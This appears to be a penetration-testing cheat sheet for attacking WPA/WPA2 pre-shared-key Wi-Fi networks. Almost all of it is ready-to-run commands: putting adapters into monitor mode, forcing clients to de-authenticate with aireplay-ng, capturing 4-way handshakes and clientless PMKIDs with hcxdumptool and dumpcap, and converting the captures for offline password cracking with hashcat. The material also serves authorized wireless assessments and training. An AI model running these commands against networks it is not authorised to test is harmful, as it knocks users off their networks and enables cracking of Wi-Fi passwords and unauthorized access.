WPA/WPA2 PSK/PMKID Capture

Automated Attack - hcxdumptool

• Automatically de-authenticates clients from AP's to induce re-authentication and capture of the 4-way handshake.
• Automatically associates to APs in order to capture EAPOL M1 which may include PMKID.

hcxdumptool Usage

Make sure the wireless adapter is on the same channel as the target AP.

Set the wireless adapter's channel #

sudo iw dev <iface_mon> set channel <channel_#>

Use hcxdumptool to capture wifi traffic and also automatically attempt client de-authentication/4-way handshake capture as well as clientless PMKID capture.

Perform automated attack

sudo hcxdumptool -i <iface_mon> -c <channel_#><band> -w pmkid.pcapng --enable_status=1

Set the after to a for 2.4ghz and b for 5ghz, depending on channel range.

Perform targeted automated attack

sudo hcxdumptool -i wlan0mon -c <ch> --filterlist_ap ap_allowlist.txt --filtermode=2 -w pmkid.pcapng --enable_status=1

4-Way Handshake Capture

• Listen for clients to connect to the WiFi AP and capture the 4-way handshake to decrypt it and recover the AP's PSK.
• Trigger/spoof de-authentication to force clients to reconnect to the AP.
  • Forced de-authentication does not work if PMF is enabled/required. Passive client connect capture still works.

Exploitation

• Tools:
  • airmon-ng usage
  • airodump-ng usage
  • dumpcap usage
  • aireplay usage
  • hcxpcapngtool

Enabled Monitor Mode

Put wireless adapter into monitor mode

airmon-ng start <iface_mon>

Find AP clients to target for de-authentication

Analyze all traffic seen by WiFi adapter

sudo airodump-ng <iface_mon>

Top section = APs

Bottom section = Clients

Analyze traffic on only a specific channel #

sudo airodump-ng <iface_mon> --channel <channel_#>

Focus on finding clients to deauth when targeting an AP.

Capture WiFi traffic

Verify wireless adapter settings

iw dev <iface_mon> info

Set Wireless adapter channel to match target AP

sudo iw dev <iface_mon> set channel <channel_#>

Capture WiFi traffic

sudo dumpcap -i <iface_mon> -w /tmp/dumpcap.pcapng

Trigger client de-authentication

Deauthenticate a client

aireplay-ng -0 1 -a <AP_MAC_Address> -c <Client_MAC_Address> <iface_mon>

If successful, airodump-ng will capture the 4-way handshake from an authenticating client and save it to a file for cracking with hashcat.

Converting traffic captured by airodump-ng to a hashcat consumable format.

hcxpcapngtool -o hashcat_crackable.22000 hcxdumptool_output.pcapng

• Hashcat
  • Mode: 22000
• WPA/Wi-Fi Wordlists

Clientless PMKID Capture

• Vulnerable routers will include the PMKID in the first EAPOL frame it sends an associating client. The PMKID can be cracked to discover the PSK.
• Works on WPA2 and mixed WPA/WPA2 that advertise RSN/PMKID; not typical on pure WPA/TKIP-only.
• Listen to traffic in monitor mode

References

• New attack on WPA/WPA2 using PMKID - https://hashcat.net/forum/thread-7717.html

Exploitation

• Tools:
  • airmon-ng usage
  • hcxdumptool usage
  • hcxpcapngtool

Put wireless interface into monitor mode

# Enable monitor mode on wireless interface
airmon-ng start <iface_mon>

Attempt to capture a PMKID from EAPOL frame

hcxdumptool -o hcxdumptool_output.pcapng -i <iface_mon> --enable_status

Attempt to capture a PMKID from EAPOL frame from a specific AP

hcxdumptool -o hcxdumptool_output.pcapng -i <iface_mon> --enable_status=1 --filterlist_ap=./targets.lst --filtermode=2

Convert hcxdumptool_output.pcapng to hashcat file

hcxpcapngtool -o hashcat_crackable.22000 hcxdumptool_output.pcapng

• Hashcat
  • Mode 22000
• WPA/Wi-Fi Wordlists